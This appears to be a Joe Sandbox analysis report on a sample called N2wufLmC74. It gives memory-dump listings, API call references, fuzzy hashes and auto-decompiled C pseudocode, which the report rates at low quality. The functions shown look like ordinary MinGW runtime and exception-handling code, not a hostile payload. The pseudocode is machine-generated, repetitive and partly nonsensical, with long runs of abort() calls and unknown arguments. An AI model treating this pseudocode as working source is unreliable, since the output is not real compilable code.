abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA67
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA6C
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA71
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA76

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: abort$Sleepstrlen
String ID:
API String ID: 68130653-0
Opcode ID: 1a88a7bd0e6c489212a411230e14d733504f3e9de92c19ac1486fef457bfb216
Instruction ID: 35bc1d8b0a702f1f2462dfd41fd96341d38b596d0bbd981a06ae03e8299243b1
Opcode Fuzzy Hash: 1a88a7bd0e6c489212a411230e14d733504f3e9de92c19ac1486fef457bfb216
Instruction Fuzzy Hash: FC51B7E210C3C5CEE731CB28A448B557FA76756308F48459CC7849B3AAD7FA9418C76B

Uniqueness

Uniqueness Score: -1.00%

Function 013D8520 Relevance: 28.6, APIs: 19, Instructions: 112COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 6d55503c7a802c807004aa04751b00d677f4baa49857e7c680e0d2efbfd5eb48
Instruction ID: 82ee942768d43c1a967ad458d842c9da7997784dbb56b6742d2594d58b51c51d
Opcode Fuzzy Hash: 6d55503c7a802c807004aa04751b00d677f4baa49857e7c680e0d2efbfd5eb48
Instruction Fuzzy Hash: D831E4716083029FE3219F2DE48476AF7E6AFC536CF98492EE64497341D334E444CB82

Uniqueness

Uniqueness Score: -1.00%

Function 013D862C Relevance: 28.5, APIs: 19, Instructions: 28COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA19
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA1E
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA23
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA28
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA2D
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA32
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA37
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA3C
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA44
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA49
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA4E
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA53
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA58
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA5D
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA62
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA67
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA6C
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA71
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA76

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 195ada3be1e78467085aad290acad52cf563cc7d1467f6b2c1806d33a27b537e
Instruction ID: bfbba8b073ac5d732a7794fbe5748bb1b60bae377d17ee8a0ce567e6a9f4b86f
Opcode Fuzzy Hash: 195ada3be1e78467085aad290acad52cf563cc7d1467f6b2c1806d33a27b537e
Instruction Fuzzy Hash: 09B01210C4932AC1C4003F6C409C07BE2F85A1B28CFC63D04D02A734C1C710F801420E

Uniqueness

Uniqueness Score: -1.00%

Function 013D8A40 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 132
COMMON

Download Yara Rule

C-Code - Quality: 25%

			E013D8A40(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v0;
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				intOrPtr _v24;
				signed int _v40;
				intOrPtr* _v52;
				char _v220;
				signed char _v249;
				unsigned int _v252;
				intOrPtr* _v272;
				intOrPtr _v276;
				char _v348;
				void _v476;
				void* _v488;
				intOrPtr* _v492;
				intOrPtr _v496;
				intOrPtr _v500;
				intOrPtr _v504;
				char* _v548;
				void* _t69;
				intOrPtr* _t73;
				struct HINSTANCE__* _t74;
				_Unknown_base(*)()* _t75;
				struct HINSTANCE__* _t78;
				_Unknown_base(*)()* _t79;
				intOrPtr* _t80;
				void* _t82;
				void* _t87;
				void* _t89;
				void* _t94;
				struct HINSTANCE__* _t97;
				intOrPtr _t99;
				intOrPtr* _t104;
				signed int _t105;
				signed int _t115;
				void* _t126;
				void* _t136;
				_Unknown_base(*)()* _t139;
				void* _t145;
				void* _t151;
				intOrPtr* _t153;
				char** _t156;
				char** _t157;
				struct HINSTANCE__** _t159;
				struct HINSTANCE__** _t160;
				intOrPtr* _t161;

				_t145 = _t151;
				_t136 =  &_v476;
				_t94 =  &_v348;
				_push(__edx);
				_push(__eax);
				E013D8320( &_v476, _v0,  &_a4);
				memcpy(_t94, _t136, 0x20 << 2);
				_t153 = _t151 - 0x1e4 + 0xc;
				_t126 = _t136 + 0x40;
				while(1) {
					_t69 = E013D7CB0(_t94,  &_v220);
					if(_t69 == 5) {
						break;
					}
					if(_t69 != 0) {
						L20:
						return 3;
					} else {
						_t104 = _v52;
						if(_t104 == 0) {
							L11:
							E013D7100(_t94,  &_v220);
							_t115 = _v40;
							_t73 = 0;
							if( *((intOrPtr*)(_t145 + _t115 * 8 - 0xd4)) == 6) {
								L17:
								_v272 = _t73;
								continue;
							} else {
								if(_t115 > 0x11) {
									L23:
									abort();
									abort();
									abort();
									abort();
									abort();
									abort();
									abort();
									abort();
									abort();
									abort();
									abort();
									abort();
									abort();
									abort();
									abort();
									_push(_t145);
									_push(_t126);
									_push(_t136);
									_t156 = _t153 - 0x1c;
									 *_t156 = "libgcc_s_dw2-1.dll";
									_t74 = GetModuleHandleA(_t94);
									_t157 = _t156 - 4;
									if(_t74 == 0) {
										_t75 = 0x13dae40;
										_t139 = E013DA660;
									} else {
										_t97 = _t74;
										 *_t157 = "libgcc_s_dw2-1.dll";
										_t78 = LoadLibraryA(??);
										_t159 = _t157 - 4;
										 *0x14f2020 = _t78;
										_v548 = "__register_frame_info";
										 *_t159 = _t97;
										_t79 = GetProcAddress(??, ??);
										_t160 = _t159 - 8;
										_t139 = _t79;
										_v548 = "__deregister_frame_info";
										 *_t160 = _t97;
										_t75 = GetProcAddress(??, ??);
										_t157 = _t160 - 8;
									}
									 *0x1481004 = _t75;
									if(_t139 != 0) {
										_v548 = 0x14f2024;
										 *_t157 = 0x14b3104;
										 *_t139();
									}
									 *_t157 = E013C1560;
									return E013C14A0();
								} else {
									_t105 =  *(_t115 + 0x14f20b0) & 0x000000ff;
									_t73 =  *((intOrPtr*)(_t145 + _t115 * 4 - 0x158));
									if((_v249 & 0x00000040) == 0 ||  *((char*)(_t145 + _t115 - 0xec)) == 0) {
										if(_t105 != 4) {
											goto L23;
										} else {
											_t73 =  *_t73;
											goto L17;
										}
									} else {
										goto L17;
									}
								}
							}
						} else {
							_v488 = _t94;
							_t80 = _a4;
							_v492 = _t80;
							_v504 = 1;
							_v496 =  *((intOrPtr*)(_t80 + 4));
							_v500 =  *_t80;
							 *_t153 = 1;
							_t82 =  *_t104();
							if(_t82 == 6) {
								 *((intOrPtr*)(_a4 + 0xc)) = 0;
								 *((intOrPtr*)(_a4 + 0x10)) = _v276 - (_v252 >> 0x1f);
								_t87 = memcpy(_t94,  &_v476, 0x20 << 2);
								_t161 = _t153 + 0xc;
								_t69 = E013D8520(_t87,  &_v220, _t94);
								if(_t69 != 7) {
									break;
								} else {
									_t89 = E013D6750( &_v476, _t94);
									_t99 = _v272;
									_v504 = _t99;
									 *_t161 = _v276;
									E013D8A30(_v276);
									 *((intOrPtr*)(_t145 + _t89 + 4)) = _t99;
									return _v24;
								}
							} else {
								if(_t82 != 8) {
									goto L20;
								} else {
									goto L11;
								}
							}
						}
					}
					L38:
				}
				return _t69;
				goto L38;
			}

0x013d8a41
0x013d8a45
0x013d8a4c
0x013d8a52
0x013d8a58
0x013d8a68
0x013d8a72
0x013d8a72
0x013d8a72
0x013d8b1d
0x013d8b25
0x013d8b2d
0x00000000
0x00000000
0x013d8a82
0x013d8b40
0x013d8b4f
0x013d8a88
0x013d8a88
0x013d8a8d
0x013d8ac6
0x013d8ace
0x013d8ad3
0x013d8ad6
0x013d8ae0
0x013d8b17
0x013d8b17
0x00000000
0x013d8ae2
0x013d8ae5
0x0147aa2d
0x0147aa2d
0x0147aa32
0x0147aa37
0x0147aa3c
0x0147aa44
0x0147aa49
0x0147aa4e
0x0147aa53
0x0147aa58
0x0147aa5d
0x0147aa62
0x0147aa67
0x0147aa6c
0x0147aa71
0x0147aa76
0x013c14c0
0x013c14c3
0x013c14c4
0x013c14c6
0x013c14c9
0x013c14d0
0x013c14d6
0x013c14db
0x013c1550
0x013c1555
0x013c14dd
0x013c14dd
0x013c14df
0x013c14e6
0x013c14f2
0x013c14f5
0x013c14fa
0x013c1502
0x013c1505
0x013c1507
0x013c150a
0x013c150c
0x013c1514
0x013c1517
0x013c1519
0x013c1519
0x013c151c
0x013c1523
0x013c1525
0x013c152d
0x013c1534
0x013c1534
0x013c1536
0x013c1549
0x013d8aeb
0x013d8aeb
0x013d8af2
0x013d8b00
0x013d8b0f
0x00000000
0x013d8b15
0x013d8b15
0x00000000
0x013d8b15
0x00000000
0x00000000
0x00000000
0x013d8b00
0x013d8ae5
0x013d8a8f
0x013d8a8f
0x013d8a93
0x013d8a96
0x013d8a9f
0x013d8aa7
0x013d8aab
0x013d8aaf
0x013d8ab6
0x013d8abb
0x013d8b63
0x013d8b77
0x013d8b83
0x013d8b83
0x013d8b8b
0x013d8b93
0x00000000
0x013d8b95
0x013d8b9d
0x013d8ba2
0x013d8baa
0x013d8bba
0x013d8bbd
0x013d8bc2
0x013d8bda
0x013d8bda
0x013d8ac1
0x013d8ac4
0x00000000
0x00000000
0x00000000
0x00000000
0x013d8ac4
0x013d8abb
0x013d8a8d
0x00000000
0x013d8a82
0x013d8b3d
0x00000000

Strings

@, xrefs: 013D8AF9

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: strlen
String ID: @
API String ID: 39653677-2766056989
Opcode ID: 0fff18140819d535f1469af8543fabe3a1948a592f63c0b707c167de89368d6a
Instruction ID: db3d6c41f15bc0a65eb5684592306543f1b2e69e4239188c08c5f09dc7c16d42
Opcode Fuzzy Hash: 0fff18140819d535f1469af8543fabe3a1948a592f63c0b707c167de89368d6a
Instruction Fuzzy Hash: 21414A75E002199FCB10DF68D984BDEB7F1AF89318F1485A9D949BB341D730AE848F91

Uniqueness

Uniqueness Score: -1.00%

Function 013D8670 Relevance: 27.1, APIs: 18, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: strlen
String ID:
API String ID: 39653677-0
Opcode ID: 6595b8e4463ef9e94a5e3558c1858c7f4e3cab1e679f6eb8daef6c8abcbfff08
Instruction ID: 88a5e9027ddae0194260866bbd6dcc889098f06e2ad42cb5cd7273f52d1d5904
Opcode Fuzzy Hash: 6595b8e4463ef9e94a5e3558c1858c7f4e3cab1e679f6eb8daef6c8abcbfff08
Instruction Fuzzy Hash: B34155B5A083018FE720DF1DE58062AFBE1EBC9718F158D6EE688D7351D374E8448B92

Uniqueness

Uniqueness Score: -1.00%

Function 013E73E0 Relevance: 26.4, APIs: 10, Strings: 5, Instructions: 130fileCOMMON

Download Yara Rule

APIs

memcpy.MSVCRT ref: 013E7451
fwrite.MSVCRT ref: 013E74F8
fputs.MSVCRT ref: 013E7515
fwrite.MSVCRT ref: 013E753E
fputs.MSVCRT ref: 013E755D
fwrite.MSVCRT ref: 013E758C
fwrite.MSVCRT ref: 013E75BE
abort.MSVCRT ref: 013E75C3
abort.MSVCRT(?,?,?,?,?,?,014746C0,?,?,?,?,?,?,01477ADF), ref: 014788C3
free.MSVCRT(?,?,?,?,?,?,014746C0,?,?,?,?,?,?,01477ADF), ref: 014788CB

Part of subcall function 013D50D0: strlen.MSVCRT ref: 013D5155
Part of subcall function 013D50D0: memcpy.MSVCRT ref: 013D5170
Part of subcall function 013D50D0: free.MSVCRT(?,?,?,?,?,?,?,?,?,013E74CC), ref: 013D517A

Strings

terminate called recursively, xrefs: 013E75B7
terminate called after throwing an instance of ', xrefs: 013E74F1
not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): , xrefs: 013E73F9
terminate called without an active exception, xrefs: 013E7585
-, xrefs: 013E7571

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: fwrite$abortfputsfreememcpy$strlen
String ID: -$not enough space for format expansion (Please submit full bug report at https://gcc.gnu.org/bugs/): $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
API String ID: 4144276882-1195946326
Opcode ID: c4614f44abec753f618e39fbe68981d5fab89e7c76292eecf065c038678f771e
Instruction ID: 1f00f46eda2e028d1e0f7146da9ae23765fcdbd535ba464273a2e95bdb9eee29
Opcode Fuzzy Hash: c4614f44abec753f618e39fbe68981d5fab89e7c76292eecf065c038678f771e
Instruction Fuzzy Hash: C9514AB08083169FD710EF68C48879EBFE4BF99318F42895EE4D887291D7789485CF92

Uniqueness

Uniqueness Score: -1.00%

Function 013D8805 Relevance: 25.5, APIs: 17, Instructions: 41COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA23
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA28
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA2D
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA32
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA37
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA3C
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA44
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA49
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA4E
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA53
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA58
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA5D
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA62
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA67
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA6C
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA71
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA76

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 60969ea96a1b94903995695ee3a7cacfd4b234cf9fd77bdcd3f7e8106ee65f9c
Instruction ID: e5459901eb461709b0c2931d14d60f55805cf62d826b11bba358ae0ddc128ae4
Opcode Fuzzy Hash: 60969ea96a1b94903995695ee3a7cacfd4b234cf9fd77bdcd3f7e8106ee65f9c
Instruction Fuzzy Hash: B6E03071D082464AD715EE2CA18873ABBB27B8360CF981588C5547B192C374F45AC786

Uniqueness

Uniqueness Score: -1.00%

Function 013D8859 Relevance: 24.0, APIs: 16, Instructions: 47COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA28
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA2D
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA32
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA37
abort.MSVCRT(?,?,?,?,00000001,?,013D758B), ref: 0147AA3C
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA44
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA49
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA4E
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA53
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA58
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA5D
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA62
abort.MSVCRT(?,?,?,?,?,?,013D92A4,?,?,?,?,?,?,00000000,00000001,013DB03D), ref: 0147AA67
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA6C
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA71
abort.MSVCRT(?,?,00000000,00000000,?,74CB4D40,013DB33F), ref: 0147AA76

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: b80481dedc79d7c40ebf4a806b6c71c75e468ad3844a55ced42f9c8b776bb2e9
Instruction ID: d03547668d39e25e5e0452509160a778ea93c57605b1296768807537cf3317f1
Opcode Fuzzy Hash: b80481dedc79d7c40ebf4a806b6c71c75e468ad3844a55ced42f9c8b776bb2e9
Instruction Fuzzy Hash: 80F0B4B19542454BD3109F1CA48577ABFA57B87319F8C1888D5446B292C335A4948791

Uniqueness

Uniqueness Score: -1.00%

Function 013D8E00 Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 76COMMON

Download Yara Rule

Strings

@, xrefs: 013D8E68

Memory Dump Source

Source File: 00000000.00000002.240345679.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000000.00000002.240342452.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240433831.0000000001481000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240438442.0000000001482000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240507021.00000000014A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240548728.00000000014F3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240554058.00000000014F6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.240573033.000000000151A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_13c0000_N2wufLmC74.jbxd

Yara matches

Similarity

API ID: strlen
String ID: @
API String ID: 39653677-2766056989
Opcode ID: 4412fa3fdbb824a20e583453f91ff328edb1b59fa69f0a380dac3b4e0cf9ff9b
Instruction ID: 5ef19dcb442b03b238c000af95e602e4df0d219803243724cf9444ae0e6937a7
Opcode Fuzzy Hash: 4412fa3fdbb824a20e583453f91ff328edb1b59fa69f0a380dac3b4e0cf9ff9b
Instruction Fuzzy Hash: AF21AB7290021DCBDB20DF58EC84BEDB7B9AB85309F4445E6D50CBB250D730AE888F81

Uniqueness

Uniqueness Score: -1.00%

Function 013E5770 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E013E5770(signed int __eax, char* __ecx, void* __edx, void* _a4) {
				char _v20;
				signed int _v32;
				signed char _v36;
				intOrPtr _v40;
				signed int __ebx;
				void* __edi;
				void* __esi;
				signed int __ebp;
				signed int _t34;
				signed int _t35;
				signed char _t36;
				char* _t38;
				char* _t44;
				char* _t45;
				char* _t50;
				char* _t59;
				signed int _t63;
				char* _t82;
				void* _t83;
				char* _t85;
				void* _t86;
				void* _t87;
				char** _t88;

				_t85 = __ecx;
				_t88 = _t87 - 0x1c;
				if(__eax == 0x50) {
					_t34 = __ecx + 0x00000003 & 0xfffffffc;
					_t35 =  &(4[_t34]);
					__eflags = _t35;
					 *_a4 =  *_t34;
					return _t35;
				} else {
					_t63 = __eax;
					_t36 = __eax & 0x0000000f;
					if(_t36 > 0xc) {
						L20:
						abort();
						abort();
						abort();
						abort();
						 *_t88 = _t36;
						L01477A60();
						_t38 = E014746B0(_t82, __eflags);
						 *_t88 = _t38;
						L01477A60();
						_t64 =  *(E01477CF0());
						__eflags = _t64[0x30] & 0x00000001;
						if((_t64[0x30] & 0x00000001) == 0) {
							L28:
							_t64 =  &(_t64[0x50]);
							L25:
							E013E5500(0,  &_v20, _t86);
							_t78 =  *((intOrPtr*)(_t64 - 0x50));
							 *_t88 = _t85;
							_t44 = E013E55D0( &_v20, _t64, _t78);
							__eflags = _t44;
							if(_t44 != 0) {
								E01477EA0();
								L30:
								 *_t88 = _t82;
								E013E58C0();
								abort();
								 *_t88 = _t44;
								_t45 = L01477A60();
								abort();
								__eflags = _t78 != 1;
								 *_t88 = _t45;
								if(_t78 != 1) {
									L36:
									L01477A60();
									E01477BA0(_t64, _t82, _t85, _t86);
									L33:
									abort();
									 *_t88 = _t82;
									free(??);
									E01477EA0();
									goto L36;
								}
								_t50 =  *((intOrPtr*)( *((intOrPtr*)(L01477A60())) + 8))();
